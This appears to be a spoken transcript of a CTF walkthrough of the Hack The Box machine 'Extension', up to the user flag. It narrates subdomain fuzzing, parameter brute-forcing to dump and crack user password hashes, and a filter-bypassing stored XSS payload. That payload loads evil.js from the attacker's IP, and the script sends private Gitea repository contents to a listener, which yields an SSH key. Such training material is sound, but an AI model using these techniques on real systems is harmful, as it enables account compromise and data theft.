Well, hello everyone. Welcome back, guys. Hope you all are doing well. This is Mohammad Badruddin, and today we are going to start another machine from Hackthebox. The machine name is Extension, and the difficulty level of this machine is hard. So, without wasting time, let's go and we start the machine with the nmap scan. So, to nmap scan, nmap space hyphen s capital V for version enumeration space hyphen s capital C for default scripts, and the target IP is 10.10.11.171, and I want to save the scan results in a file named as default.nmap. You can name this file as you want. I already ran the scan to save the time, so I'm going to show you the scan results cat default.nmap. So two ports are open, port number 22 and port number 80. Both of these ports are TCP port and the states are open. But the port 22 is default for SSH and port number 80 default for HTTP. SSH is using OpenSSH 7.6p1 and the port number 80 using NGINX 1.14.0. So I already created a record in etc host file with the name snippet.htb so that I can access this file with the name snippet.htb. Fine. So let's go. There are options like login and register. So before going to register a user, it's always better to have some kind of enumeration in the backend. So I'm going to use FUF for the subdomain enumeration. So FUF space -w for the word list, and the word list I'm going to use from the sec list. So discovery, DNS, and subdomains top 1 million space -u, which is going to be http:// snippet.htb. Fine. And then space -h for the header, and the header I'm going to use is host header fuzz.snippet.htb. okay, and let's say space -t60. Fine. So let's just hit enter, and as we hit enter we can see all of these status are 200 and size is again we have size 0 and size 37,892, words 1, and here 1022. But these two, the first entries, these two first entries, you can see their size and their words are different. So most probably these are going to be two valid subdomain, but to be sure I want to make few things, like I want to filter words 1022 and 1, and let's see what we will get. So space -fw 1, 1022, hit enter, and yeah, these two are the valid subdomains. Fine. So let it run. Till then we can go back to the browser and try to register a user, but I want to capture all the traffic in my burp suite. So let's start the burp proxy on the browser and hit on register. Fine. So here I'm going to first check whether we are getting request here. Yeah, we are getting the request. Fine. So let's say cybersec radar, this is going to be the username, and csr at test.local. okay, and the password I'm going to set 123456 and hit register. So as you can see here, we have some error and it's saying the given domain is invalid. So let's try to change something in this domain. Let's say testing.local, or let's say I'm going to use gmail.com. okay, 123456, 123456. And again, the given domain is invalid. That means this application is not accepting any other domain except the domain on which this application is published. So I change it to snippet.htb, and now register again, and now the error changed. Now it's saying registration not allowed at this moment. Fine. So okay, it's not allowed. Go back to the FUF and I'm going to Control C. Now I'm going to create these two record, dev and mail, into etc host file. So I'm going to say echo space -n 10.10.11.171. Okay, and here I'm going to say dev.snippet.htb, and the other one is mail.snippet.htb. okay, and make sure you put 2 arrow signs so that it's going to be append on the file, not overwrite the file. /etc/host, hit enter, and if I say grep dev.snippet into /etc/host file, so we have both of these records. It's created in the etc host file. Now what I'm going to do, let's go and try to access these two subdomains. So http://dev.snippet.htb, and here I'm going to access mail.snippet.htb. Fine. So this is the Git server. Okay, Git service is published on this subdomain, and there is Roundcube webmail server. Fine. So there are a few things like this API. So if I right click on this and open this in a new tab, oh, Swagger is there. Okay, fine. And here we don't know the credentials. Fine. So back here to the snippet, and first of all I'm going to see the page source. And in the page source you will find in the line number 18, you can see there is URL which is snippet.htb, port is null, default there is nothing, but the important thing is roots. So in the roots it is going to mention the function, and to access that function, what URI or what endpoint you need to access, this is mentioned here. And more important part here is you can see what methods are allowed on this endpoint, that is also mentioned. So if you want to check health check on the ignition, you need to access this endpoint with method get and head. Okay, so this is important. To log in, you need to go /login. For password request, you need to go to forget password and password email. Okay, everything is there. Password confirm, email verification, logout. So what I'm going to do, I'm going to copy this line and let's paste it here. Okay, and I don't need up to here, just delete that, and I just want to adjust this a bit. Okay, so we can see every endpoint separately in new line. Fine, so that's good. Now what I'm going to do here, I'm going to put one enter here and enter here. Let's see if we can create user here or not, because there is also registration option here. So I'm going to say cybersec. Okay, here I'm going to say radar at snippet.htb, and password is going to be 123456 123456, and username is cybersec. So register an account, and the account is registered here. I want to check whether these two applications are using same database or not. So I'm going to try to log in with the same email, which is radar@snippet.htb and 123456. These credentials do not match our record. That means both of these applications may be using different database, but that's fine. Now, if we see this application for repositories, Git service, if we go to explore and we do not find repositories, maybe there is no public repositories. Let's try users, and in the users we can see there are a bunch of users: administrator, Charlie, cybersec, this is our user, and Gene. So in the notes I'm going to write these users. Okay, two subdomains were there, which is dev mail, and we found administrator, and we found Charlie, Gene. Okay, yeah, we find these users. Is there anything in organization? No, nothing. Okay, back to the snippet. Let's try let's see. I'm going to see this post request where I try to log in into snippet. So this is the post request. Okay. Here, as we can see, there are few. Okay, so the data is actually submitted as JSON in the JSON format. So XSRF token, and there is one more cookie, which is snippet htb_session. Fine. And in the response, there is nothing much. Let's see if there is any interesting endpoint here. So snippet.view, snippet.update to update the ID, update ID again, snippet.delete. Okay. For user validation, there is management/validate, admin management dump, management/dump. So that seems interesting to me because it's trying to dump something. So no, I'm going to try this. Management/dump, and it's saying error occurred, server returned a 405 method not allowed. Why method not allowed? Because if we see this request, this endpoint closely, the method allowed is only post, not the get. So whatever we are going to access from this browser, it is by default taking the get method. So because we are capturing all the traffic from burp suite, so I'm going to take this request here and let's send this to the repeater. Go to the repeater and send this one time. So as you can see, method not allowed. Right click and change request method. Now you can see the method now is post, and because in the post method we need to supply some kind of data, and what we saw before in the login request that it's passing data in the JSON format. So this was the request. Okay, passing data in the JSON format. So now because we don't have any data to pass, so I'm just going to put here the blank curly braces and send this request. So as we send this request, we can see now the error is changed, the status is changed. Now it's 419 and it's saying unknown status. And if we see, it's saying page expired, and go till the last, and again, as you can see, page expired. So if we think a bit, page expired means it seems like the session expired. And when you got the session expired message, once your CSRF token is expired, or your cookie has some kind of time restrictions or time validation and the cookie is expired, so at that instant your page or your session got expired. So that means maybe the cookie we are using here, the session cookie we are using here, is expired. So let's try to see this request. And we found before that this request is using some other tokens too, like this token, and this is the inertia version. So maybe because of that we are getting the page expired message, because you can see here the cookie is same. So what I'm going to do here, I'm going to send this request to the repeater, go to the repeater, send the request again, and instead of this endpoint I'm going to put here management/dump. So we can do it in both ways, like we can copy these tokens and version and we can put this in that request, or we can just change the URI or endpoint of this request to the management/dump. And here, because we don't have any data, so again I'm going to delete that and put 2 curly braces. Now send this request, and now as you can see the status is changed, and this time we got the 400 status message, status code with the message bad request, and you can see it's saying missing arguments. So missing arguments means because we are not giving anything in the data, so this is saying argument is missing. Now if I say argument, let's say we have one argument and the value is the value of this argument. Now send this again, and again it's saying missing argument because the argument is not arg, it is something else. So now there are few ways you can brute force or enumerate this argument by sending this request to the intruder. You can send this request to the intruder, go to the intruder, clear all, okay, and just add this org as the first position, okay, sniper attack, and then go to the payload, and here I can load a word list. Let's say we are already inside web content of seclist, so seclist discovery web content, and here I can use either bub parameter name, we can use this word list, or you can use a raft small word, where is it, lowercase small, this is medium small word dot text, this one, okay. So choose any of these list and then go to the options, and in the options, from the options we can choose grep exec, add this part, okay, and now just run the intruder. So once you run the intruder, you will see that every request is getting missing argument, okay. So maybe the length of the response is going to be changed, or this message what we got as the error is changed if the argument has been found by the intruder, okay. So there is the download, and you can see the message is changed. It's saying unknown table name. Wait a moment, I'm going to pause it, okay. Let's try this on the repeater. So we got argument as download. Now send the request again, and yeah, that's right. Now that means the argument is used here in the application is download, but still this value, we don't know this value, and that's why it's saying unknown table name. Now we need to brute force this value, and in the same way what we did here, we will do this. So I'm going to say discard this. Now go back to the repeater, and this time I'm going to send this request to the intruder, go back to the intruder and clear everything, and we need to enumerate this one, so add that. And sniper is okay. Go to the payloads, again load the same word list or any other word list you need, you think it's okay, because download, same like before what we got as argument, we can get in any common word list. So again raft small, and go to the options, and here in the options grep exact match, scroll down, and this time I want to say, because if the table name is correct or the argument value is correct, maybe we will not get this message, right? We will see another thing. So I'm just going to make it okay and go back, scroll up and start the attack. As you can see, all the messages are unknown table name and with the same length. In few minutes, or maybe it will take too much time. And here, as you can see, it's already found profile. So I'm going back to the repeater, and let's put here profiles, send this request again, and this is actually the correct value of this argument, but the thing is there is nothing, it's empty. Okay, go back to the intruder, let's see. So we found the second value of the download argument. Let's see, let's test this. I'm going back to burp repeater, and this time I'm going to put, let's say, users here and send this request. Oh, we have all the users and we have hashes also. Wonderful. Fine. Now it's time to let's say Control A, copy that. So I'm going to use one thing. Let's go here and turn off the burp proxy. JSON formatter, and choose the first link here, very first link. Paste that. Now go up, and we don't need this part. Also, we don't need this part, and we don't need that. So okay, now just process it. So what it will do, it will actually make it in the JSON format, so it will be easy to read all these content and all these hashes and users, what users are there. Now as you can see, we have everything, every user here, and now it is very easy to understand and to read. So I'm going to say Control A. No, I can download this file, so just download it. So data JSON here. Okay, come back here. I'm gonna say move downloads data, this one, to here, right? So if I say ls, this file is there. Go back to the directory. This is the file. I'm going to rename it because I already downloaded it first. That's why it's already there. Okay. Now, if I open this file, So you can see, don't save. We have Charlie user, what we saw in the div, and we have other users, and all of these are the hashes of the password, right? So now what we need is we need passwords. Okay, very well. So for this we can create how we can get all these passwords, because I think this is too long. Yes, you can see 895 users are there. So okay, what we can do here, come back here, shebang user bin env python 3, you can say with open file is going to be /root /desktop /extension. Inside extension there is data.json, right? So here it's gonna be file, read this file as out file. I'm gonna say password is equal to out file dot read dot split, and split what, whenever it see the new line. Okay, now I say for loop so for p in password I will say if password if it see password, this is string, okay, in p, so it will take one by one each value from this passwords variable, and in this passwords variable if it see this password word, then what it will do, it is going to print p, right? So I'm going to save it and save it as extract password.py. Sorry, I need to just make it a bit bigger so you can see it. Now what we did here is we say okay, for p is a variable, for p actually it should be in, so p in passwords, so we are going to take one by one each value from the list, and in that value it is going to see if the password string is in the value of p, which is this variable which contains a value from the password, so it is going to print p, right? Now come back here and let's see python 3 extract hyphen password.py on, no, it's in, oh, we don't save it, okay, clear, and run it again. So as you can see now all the passwords we have here, all the passwords. So what we can do, we can now run this and we will say cut space -d, and wherever you see this sign, this colon sign, so leave everything but see the second row, okay. Let's hit enter. Now as you can see, the password is gone. So we are going to save it as a file. Let's say pass hash dot text. Hit enter. It should be here. Pass hash dot text. Okay. Now go to the view. Go to the search and go to the find and replace. Now here, if I put double quotes, you can see these two double quotes are there. Now what we do is just replace. Now both of these double quotes are gone. Now just comma is there, so put comma, replace with nothing. Done. And just Control S to save it. Now I'm going to first of all see what kind of hash this is. So I'm going to copy this value, come back here and clear that, echo space -n, paste the hash, and let's say wc space -c, number of characters, 64 characters are there, and most probably this is going to be SHA 256. Let's see, hashcat wiki hash examples. Okay, Control F, SHA 256, SHA 256, this one. Copy that and come back here, echo space -n, paste that, wc space -c, and 64. Okay. Before going to crack the hash, okay, one thing you need to keep in mind, the mode value is 1400 for SHA 256. But to make sure, before going to crack this hash, let's say hash identifier, okay, and copy this, come back here, paste that. Now you can see hash type is SHA2 256. Wonderful. So the character length you can see 64. Okay, now clear that, hashcat space -m 1400, and the file name is pass hash.txt, and user share word list rocku.txt, and that's it. Let's say hit enter. So as you can see here, we found the password. So we have password with this hash. Okay, I need to keep this with me, so I'm going to copy it and paste it here. Notes, let's paste that here. Okay, now I don't want this, I don't want this, and also this one. No, I need this one. Why? Because we know that, okay, this is the password, and this password comes from this hash, but we don't know the user of this password. So we need to copy this hash and go to this data.json file, Control F, and just paste that hash here. As you can see, I pasted it. Just hit enter. Now you can see this hash belongs to Letha user. Okay, and if you see here, there are 4 occurrences of this hash. That means there are other users too, those are using the same password. Okay, so I'm going to keep all these users one by one with me. So copy that and come to the notes.txt. I'm going to paste this user, then go back to the data.json file. Let's see who else is using this one. Frederick, wonderful. So we found the second user who is using the same password. Okay, now the third one, go down. There is another user, gia@snippet.htb. Copy that. Come on, paste that. Now come back here and let's see who is the last one. So there is another user named as Juliana. She is also using the same password. So copy that and paste it here. So these 4 users using the same password, and we got it from the snippet. So let's go back to the snippet. Close this. Okay, close that. And let's try to log in with that user. So I'm going to try with, let's say, Letha. This is the first user, Letha, Letha at snippet.htb. Okay, and the password is PASSWORD123. Hit enter and wonderful, we logged in. That's good. Okay, now there are a few options like dashboard, browse snippets, and members. Let's go and see browse snippet. Okay, there is a snippet from a username Isaac, and once we click it, we come here. So name, language, author, content. Okay, now if we see the URL, there is snippet/1. Snippet/1. Let's go here where we have all the endpoints. So snippet/1 means we can say like this. Snippet/1, and 1 means maybe ID, something like this. We found this before here. So you can see snippets view, and the endpoint is snippet/ID. Okay, so that means this is the ID. So if I try to change this ID, change from 1 to 2 and hit enter, we found something here. And we found that this snippet is written by Gene user, and Gene user we found here. Fine. So we saw a snippet from the Gene user, but the content we cannot see it because we are not authorized to view that. So again, I'm going back here to see if there is any interesting endpoint. So there is API snippet update, and it is using that endpoint snippets, then update, then /ID. So whatever snippet you want to update, you need to access this endpoint where you just need to put the update and the ID of the snippet. And if I come back here, if I just put here /update, so snippets, update, and this is the ID too. Because I'm curious, it's saying you're not authorized to view, but I'm curious, I cannot see, but I can update if there is authorization implementation is not correct, or maybe there is vulnerability in the authorization part of this feature. So maybe we can see it. Hit enter, and as you can see, we can see it. So we are trying to update it, but our purpose is to view. So once we try to update it, it gives you the whole content of this snippet. Okay, you can also make this snip public. If you make it public, then everyone can see it. Same like the repositories we put on the GitHub or Git application. If we create a repository, but the repository is set to private, no other user can see it. But if it is public, everyone can see it. So here our purpose is to see it, not to make it public. You can make it public, but the thing is, the most important part is here you can see the header is authorization, and the authorization it uses basic authorization. So you know that in the basic authorization, if you know, okay, if you don't know, I'm telling you that the basic authorization, username colon passwords, the credentials are defined like this in this format, and the username colon password is then base 64 encoded. Okay, so that means whatever we have here, this string, within this string we will find the username and password if we decode it into the base 64. Fine, so I'm going to copy this. Okay, come back here, clear that, echo space -n, and paste that here, pipe base 64 space -d to decode, and you can see this is before this colon, this is the username and this is the password, right? So I'm going to Control-Shift-C to copy it, and let's paste that here. Okay, so this is the password. Let's try to log in on Git application because we found that user here. Okay, so I'm going to, CyberSec is our user. I'm going to write it also so that we do not forget it. CyberSec is the username /radar at snippet.htb. This is our email and the password is this. Fine, copy, come back here. Now I'm going to sign out and log in as Gene. Okay, we need to sign in. So Gene at snippet.htb, and the password is going to be this. Copy, paste that, and sign in. So now you can see we sign in to the Gene user, and as we can see here, there is one repository named as extension. Okay, and this repository, first of all, this repository is private, so that's why we cannot see that repository from the user we created. Okay, there is background.js. There is nothing in that. Back again, let's see index.js. Okay, it's accessing this URL. So link.protocol, which is going to be HTTP or HTTPS or FTP, whatever. But here it's most probably HTTP colon then // then link host name. So the host name could be dev.snippet.htb. Okay, and then it is using the API v1 repos and then the link path name. And this is using the API v1 / repos. So this is from here. So if we go, like, suppose we want to see the repository of a user, so repos / owner name. So like here Gene is an owner of this repository, so repos / Gene and the repository name. So the repository name is extension, like that. If I try it out, and here let's say Gene is the owner and name of the repository is extension and execute it. So now you can see this is the URL. Okay, http:// then this is the domain name, then it is accessing API/v1/repos, and inside repository this is the thing. So my purpose is to show you what exactly it's doing here. Fine. So now it's previewing that URL and then fetch URL, then response it in the JSON format and issue it as the data.body. Fine. And here there is a function which is going to check the strings, and first of all here it is going to remove the tags, HTML tags, and then it is going to filter. What it's going to filter? Semicolon slash no, this is actually escape character, I think. So semicolon, single quote, small brackets, and there are some strings like source, script, and special character, pipe special character, big brackets, commas and all. So let's see. I'm going back again to the extension and we can read this README file. So this extension is designed to aid in the viewing of issue on Gitya. It displays the body of each issue on the main issue page. In Gitya, members of our team are already using it to track issues on the internal repositories. Fine. So whatever issue you are going to, any user going to report, that issue, it is going to display the body of each issue. There is going to be XSS and we can bypass this filter. Okay, so let's try that. Because in my mind, if this Gene user has a private repository, then maybe other user, which is Charlie, I think Charlie. Yeah, Charlie. So maybe Charlie user also have a repository. Let's see. Gene extension. First of all, what I'm going to do, I'm going to create this repository public so we can see it from other users too. For this purpose, I'm going to put here, okay, now private browser, and here also I'm going to open dev.snippet.htv and let's log in from our created user. So I'm going here to settings. So let's log in, and the user, the email ID or username, let's say cybersick@snippet.htv, and the password was 123456. Username or password, oh sorry, it was the username only. Email was radar. Okay, so now if we go to explore and go to repository, we cannot see any repository, right? Now here if we go to the settings, and in the settings just uncheck this visibility and update the settings, and here just refresh the page, and now we can see, a normal user can see this repository because now it's public. Okay, so and we go to this issue page, here we will see that as a body, whatever issue we create, we see that as a body. So Now let's create an issue, and I'm going to create a new issue. So new issue here, let's say issue 1, and here I'm going to write, let's say test issue. Here I'm going to say AAA. Okay, because it's a bit tricky to bypass this, bypass these filters. Okay, but here, because of time limit, I'm just showing you the successful attempt what I did. So here I'm going to say image src source is equal to x, or whatever you want to put the value. As you can see here, it's filtering the word src source but in lowercase. So to bypass it, capital or uppercase src works. The next thing is, if the source is not x, so on error it is going to document dot write, and what it will write, again another thing which is not mentioned here in the filter list, which is this special character, which is just above your tab button. Okay, and here I'm going to specify, let's say uppercase script, and inside a script again I'm going to say source is equal to http:// 10.10.14.27 colon source is equal to / 10.10.14.27, which is my IP. I just want to check it one more time. ifconfig turn 0, yeah, 14.27. okay, and let's say 9000, and or we can just send it to port number 80. Let's say evil.js, any file, to just test it, and that's it. Just close this script script, and here actually this is going to be closed on here, and this tag it should be closed here. Fine. So that's it. Here what I'm going to do, just come back here, clear that. Fine. So Python 3 space -m http.server on port number 80. Come back here and just create this issue. And if everything is normal, we will get the hit. So here, as you can see, the notification is there, and the notification is issue what we created from here. And now you can see that issue is there, test, and then this is the image. But the image is actually source was invalid, so we did not get the image here. But let's see if we get here any hit or not. Refresh this one more time, and up to now we did not get any hit, but you need to wait for a few minutes to get a hit here. Let's refresh this one more time, and The service goes down. Why? Refresh it. Oh, what is that? Ping 10 dot 10 dot 10 dot 11.171. It's pinging. So why don't we get it here? Just close this. Issues, and there is no issue. That means something is deleting our issue, maybe. And here we did not get any hit up to now. Let's create that issue one more time real quick. So go here to issues, new issue, and let's say issue 1, test AAA, and let's say img src is equal to x, and on error is equal to document dot write, and then this sign, and close it here. Okay, script script. Script script. Make sure both of these are in uppercase, and inside script in uppercase src is equal to //10.10.14.27, which is my IP, slash I'm going to try evil.js file, which up to now does not exist. Okay, and that's it. Let's go and create this issue. Okay, here we have this issue. We found notification here. We can see this issue, and here we get the hit. Fine, we get the hit. Now that means it is trying to read or it is trying to access this evil.js file. Now what I'm going to do is I'm going to create this evil.js file here in my PC to serve this JavaScript file. So what I did is I tried to steal the cookie for the Charlie user. I tried to fetch the password of or credential of the Charlie user, but both of these didn't work. So what I did is fetch. Okay, what I want to fetch is http://dev.snippet.htb/API/v1. I'm just going to explain what is that. Users/charlie/repos. Okay, because if we go to this API Swagger, where is it? Here, yeah. So if we see this closely, we go to users. In the users, we will find user. Where was it? This one. Users, username, and repo. So list the repos owned by the given user, because we are looking for any repositories that belongs to Charlie user. We found a repo, private repo in Gene user, so maybe there are private repos for Charlie users too. So for this we need to access this endpoint from the API. So here if I say try it now, if I say username is Charlie and page and any other thing, we don't need to put it here, just execute it. So it is going to give us this endpoint. So we are actually going to try this endpoint to grab the repository of Charlie user. Okay, so if there is any repository for Charlie user, we can get it like that. Okay, so I'm going to fetch this dot then response of this is going to be response dot body, not body, let's say text. Okay, in the text format, and dot then this text is going to be it's going to fetch let's say create a variable parameter a, and it's going to set the value in the text. Okay, now I can explain this. So I'm going to access this endpoint of the API version 1, where I'm going to try to access any repository of the Charlie. Then the response is going to be in the text, and then this text is going to send on this server. Okay, so this is my attacker controlled server, is published on port number 9000. There is a parameter a, and this parameter is going to get this text value. Okay, so now I'm going to save it, Control S, and save it as avil.js file. Fine. Now just go back here, and here what I'm going to do is nc space -nlvp on port number 9000. Hit enter. So now this time, once it gets any hit on avil.js, it is going to get this avil.js file because we already created it, and now from the avil.js file it is going to execute this script. And if there is any repository belongs to Charlie, whether it is private or public, it is going to get that. So if it was public, we already got that from the repository section, but I think it's the private one. So let's see. Let's try to refresh this page to see whether our issue still exists there or not. So it still exists there. So now we just need to wait until we get hit here. And as you can see, we got hit. So this time, as you can see, before in the previous hit, it got 404, means not found. And this time it got 200 status code, means the avil.js file exists. And now we found, you remember, we specify the parameter a, and now this parameter a value is interesting. So I'm going to copy it, and let's open here CyberChef, or we don't need CyberChef. Go to decoder, just paste that here, and smart decode. Now just Control A and copy this value back to our notes, and here we can paste this. Okay, now id is equal to 2, owner ID is equal to 3, login, Charlie is the username, and this is the email of the Charlie user. This is the avatar link, restricted false, and there is something. Name is backups, and full name is Charlie/backups. So if we see here, the repository name was gene/extension. Similarly here, full name was Charlie/backups. That means there is one repository and the repository name is backups. And the description is backup my home directory. And this is so great because this repository contains the home directory of Charlie user. So this is interesting. And now as you can see here, this is HTML URL to access the Charlie users repository. But the thing is, we cannot directly access it. Is there anything interesting? Enable issue dependency is true, has wiki true. So nothing else. Here we just found the repository name, which is Charlie/backups. That's it. And we found an HTML URL, which is this. So copy that and paste it here. That's it. We just found this. Nothing else. So back to the API Swagger here, and let's see how we can see what's inside this repository, or how we can access this repository. So now we know the repository. Let's see the repository section. Owner repo. So the owner is Charlie and the repository is backups. Execute that. 404. Okay, but it should be like this. Let's see. Is there anything else? Scroll down. Actually, there is get the metadata of all the entries of the root directory of the repository. So repos owner and the repository name and the contents. So in that way you can get all the metadata of the repository root directory. Okay, so let's try this one. I don't think it is going to work here. Charlie and the repository name is backups. Execute 400. But yeah, this is going to be the URL. So what I'm going to do here is copy this. Let's go back to our avil file, avil.js, and I'm just going to change this thing. Okay, so paste that, and here what I'm going to do is clear this and start the server again, save it. That's it, because every time it is going to get the hit for avil.js, and whenever it gets avil.js, it is going to execute this. So this time I'm just going to access this contents of the Charlie backups repository. Let's see. Just I want to make sure whether issue is still exists. Yes, it still exists. So this is the last one. And as you can see, we got the new hit here, and we found the content, I think, the metadata of it. So again, I'm going to copy this up to here, copy, come back here to the burp suite, Control A, delete that, paste the new one, and smart decode. So now, as you can see, the name of the file, if you want to download, is I think backup.tar.gz. This is the path hash of the file. This is, I think, file size. Encoding is null, target null. Actually, copy this and let's paste that here. Okay, so there is URL. This is the master. Okay, reference HTML URL, which is this. This is going to be your Git URL up to here, and this is your download URL. Fine. Submodel and whatever is that. Okay, and this is Git and this is HTML. So as you can see, this is the URL, and with this URL, I think we can try to access the backup.tar file. There is one download URL, but that will not work. So if I copy this and let's say here wget and paste that, hit enter, so not found. Like that we cannot access. So what we need to do is we need to just slight change our avil.js file. So instead of this URL, I'm going to put that one, and here we just need to put one thing: API /v1, okay, /repos, okay, and rest of the things are okay. Charlie, backups, raw, not raw. We don't need that. Raw we don't need. Branch, master, all of this we don't need. Just wait a moment. I think this was not the this is the download one. We don't need the download one. We need this URL. Okay, so copy this back to avil, paste that. That's perfect, because here you can see API v1 repos already there, so we don't need to change anything. Just that's it. Save it and come back here, clear that, come on, clear that, and just start the listener again. This was our previous request, and we get a new hit. And as we get new hit, we found here some base 64 content. Okay, these are base 64. First of all, I'm going to copy this up to here. Okay, Control Shift C and come back to the burp proxy, paste that here, smart decode, Okay, so self is this, which is reference master. Get this. Oh, okay. Just Control A, copy all of this and put it in our notes. So come back here, paste that. Oh, okay. So name backup, okay, fine. The content of the file here, as you can see, the content is this h4s and whatever till up to here. Okay, so just copy that and save it in a new file. Paste that, Control S, and save it as backup. What was the file name? The file name was it's backup.tar.gz. So we need to save this file as backup.tar.gz. Hit enter, because as you can see here, this is the content of the file. Which file? Backup.tar.gz. So that means this is going to be our file. But one thing, just wait a moment, I did something wrong. What I make wrong here, this should not be the backup.tar. So rename it, and here I'm just going to specify it as backup, rename it, and now we need to base64 decode this file and save it as backup.tar.gz, which I'm going to do it from here. So I'm going to say cat backup base64 space -d, decode it, and then save it in a file named as backup.tar.gz. Hit enter, and this time what we get is this. Now if I open this, as you can see, we got the home, and this is the home directory of the Charlie user, and we found here .ssh. So the best thing is to extract this file here, and this is the folder Charlie home directory, this is ssh, and we got the IDRSA key of Charlie user. So now we just need to change the permission of it. So I'm going to say chmod 600 home Charlie .ssh id underscore rsa, not public, id underscore rsa. That's it. So clear it, and let's try to access ssh space -i Charlie at snippet.htb. Hit enter, finger cross. Yeah, I did mistake again. Oh, it should be home / Charlie.ssh and id underscore rsa, and this time we will get the shell. We will get, yeah. So we got the ssh as Charlie user. Who am I? ID and host name, which we can already see here its extension. So Charlie, this is the ID, and this is the username, this is the host name. Now what we need to do here is, let's see how many users are there. Those can run bin bash. So /bin /bash /etc /passwd. So, oh, there is Gene also. Okay, these are the users. I'm going to copy it and paste it in our notes. Come on. So these are the users. Although we already have the password for Gene, so we can try to access Gene from the Charlie shell. Where is Gene? This is the password for Gene. This is the password for Gene. So just copy that, come back here. Clear. First of all, let's see if there is user flag. No, there is no user flag. Okay, so su Gene, switch user to Gene and paste the password what we copied before. Hit enter, and now we are Gene. So clear who am I ID and host name, it's same, but yeah, the user is Gene. This is the important part. Now if I go to the home directory of Gene and we say ls space -la, you can see there is a file users.txt, and if I cat this file, so this is your first user flag. Well done. And there is one interesting directory here which is projects, and that we will see in the privilege escalation part in the second part of this video. So up to now we just reached up to users and we got the first flag. So that's it for this video. Hope you understand things. If you have any query, you can put your query in the comment section, and I will see you in the next video of the extension machine in the part 2. See you and bye.